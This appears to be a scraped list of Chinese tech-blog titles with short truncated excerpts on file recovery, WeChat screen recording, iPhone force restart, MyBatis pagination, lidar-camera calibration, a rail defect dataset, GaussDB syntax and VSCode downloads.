“这下可怎么办呀&#xff1f;我有些比较重要的文件保存在桌面&#xff0c;现在这些文件都莫名奇妙的丢失了&#xff0c;我应该怎么将它们恢复呢&#xff1f;快帮帮我吧&#xff01;” 在日常使用电脑时&#xff0c;很多电脑用户为了方便&#xff0c;可能会随手将一些文件直接保…

微信视频怎么录屏?超简单教程,一学就会!

“微信视频的时候怎么录屏呀&#xff1f;和朋友打微信视频&#xff0c;她每次都偷偷录我的丑照&#xff0c;我也想把她录下来&#xff0c;但是不会怎么操作&#xff0c;求求大家教教我&#xff01;” 微信作为全球最大的社交媒体平台之一&#xff0c;承载了无数珍贵的瞬间和回…

iPhone强制重启教程来了!(已解决)

强制重启是解决苹果手机系统故障问题的首选操作&#xff0c;是通过特殊组合按键来强制关机并重新启动设备的操作。可以用来应对系统崩溃、设备无响应、白苹果、死机、闪退、莫名其妙黑屏等情况。 那么大家知道该如何将iPhone手机强制重启吗&#xff1f;iphone强制重启的方法是…

福建厦门航空飞机零部件检测3D扫描测量尺寸偏差-CASAIM中科广电

航空航天是一个创新型发展国家的尖端命脉&#xff0c;代表着一个国家科学技术的先进水平。在航空航天工业的发展和组成领域中&#xff0c;对于在制造业中的航空航天产品零部件精度要求十分严苛&#xff0c;从前期的设计、中期建造、后期维修检测&#xff0c;任何一个环节、任何…

Mybatis一对多查询,分页显示问题解决方案

原文&#xff1a;Mybatis一对多查询&#xff0c;分页显示问题解决方案_mybatis一对多分页问题-CSDN博客 在我们的开发中也许是遇到最多的功能&#xff0c;一张表的分页&#xff0c;多张表一对一功能的分页相信大家写来都是得心应手&#xff0c;但是在一对多分页查询的时候大家…

【Ubuntu18.04】激光雷达与相机联合标定(Livox+HIKROBOT)(一)相机内参标定

LivoxHIKROBOT联合标定——相机内参标定 引言1 海康机器人HIKROBOT SDK二次开发并封装ROS1.1 介绍1.2 安装MVS SDK1.3 封装ROS packge 2 览沃Livox SDK二次开发并封装ROS3 相机雷达联合标定——相机内参标定3.1 环境配置3.1.1 安装依赖——PCL 安装3.1.2 安装依赖——Eigen 安装…

【表面缺陷检测】钢轨表面缺陷检测数据集介绍(2类,含xml标签文件)

一、介绍 钢轨表面缺陷检测是指通过使用各种技术手段和设备&#xff0c;对钢轨表面进行检查和测量&#xff0c;以确定是否存在裂纹、掉块、剥离、锈蚀等缺陷的过程。这些缺陷可能会对铁路运输的安全和稳定性产生影响&#xff0c;因此及时进行检测和修复非常重要。钢轨表面缺陷…

GaussDB SQL基础语法示例-BOOLEAN表达式

目录 一、前言 二、GaussDB SQL 中的BOOLEAN表达式介绍 1、概念 2、组成 3、语法示例 三、在GaussDB SQL中的基础应用 1、示例1&#xff0c;使用比较运算符 2、示例2&#xff0c;使用逻辑运算符 3、示例3&#xff0c;使用IS NOT NULL运算符 4、示例4&#xff0c;使用…

vscode安装包下载——vscode的下载速度慢问题两种解决方法

1.vscode下载&#xff1a; 1.首先我们去官网下载vccode&#xff0c;下载过程非常慢&#xff1a; 官网链接&#xff1a; https://code.visualstudio.com/ 2.解决办法1 这是因为国外镜像地址下载慢的原因&#xff0c;此时需要去国内镜像地址进行下载&#xff0c;复制下载链接&…